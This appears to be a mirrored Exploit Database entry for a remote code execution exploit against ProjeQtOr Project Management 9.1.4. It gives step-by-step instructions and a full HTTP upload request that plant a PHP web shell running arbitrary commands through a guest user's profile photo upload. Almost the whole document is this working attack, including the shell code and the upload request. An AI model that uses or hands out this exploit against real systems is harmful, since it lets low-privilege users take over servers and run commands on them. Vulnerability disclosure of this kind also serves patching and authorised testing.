ProjeQtOr Project Management 9.1.4 – Remote Code Execution

• Exploit Database
• 15 阅读

• 作者： Temel Demir
  日期： 2021-06-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49919/

• # Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution
  # Date: 29.05.2021
  # Exploit Author: Temel Demir
  # Vendor Homepage: https://www.projeqtor.org
  # Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip
  # Version: v9.1.4
  # Tested on: Laragon @WIN10
  # Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section. 
  
  PoC Process Step_by_Step:
  
  # 1) Create a file with the below php code and save it as demir.pHp
  
  <?php echo shell_exec($_GET['key'].' 2>&1'); ?>
  
  # 2) Login to ProjeQtOr portal as guest user
  # 3) Click -profile- button on header panel.
  # 4) Click -add photo- button and chose upload section and browse your demir.pHp file.
  # 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" )
  # 6) As a last step you have to add the ".projeqtor" statement to the file extension.
  You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor
  
  # 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command]
  
  
  
  Example Request:
  
  POST /project/tool/saveAttachment.php HTTP/1.1
  Host: ip:port
  Content-Length: 1196
  Accept: application/json
  X-Requested-With: XMLHttpRequest
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ
  Origin: http://ip:port/website_location/
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: http://ip:port/website_location/view/main.php
  Accept-Encoding: gzip, deflate
  Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
  Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit)
  Connection: close
  
  ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
  Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp"
  Content-Type: application/octet-stream
  
  <?php echo shell_exec($_GET['key'].' 2>&1'); ?>
  ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
  Content-Disposition: form-data; name="attachmentId"
  
  
  ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
  Content-Disposition: form-data; name="attachmentRefType"
  
  User
  ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
  Content-Disposition: form-data; name="attachmentRefId"
  
  ($your_profile_id //edit)
  ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
  Content-Disposition: form-data; name="attachmentType"
  
  file
  ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
  Content-Disposition: form-data; name="MAX_FILE_SIZE"
  
  10485760
  ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
  Content-Disposition: form-data; name="attachmentLink"
  
  
  ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
  Content-Disposition: form-data; name="attachmentDescription"
  
  
  ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
  Content-Disposition: form-data; name="attachmentPrivacy"
  
  1
  ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
  Content-Disposition: form-data; name="uploadType"
  
  html5
  ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ--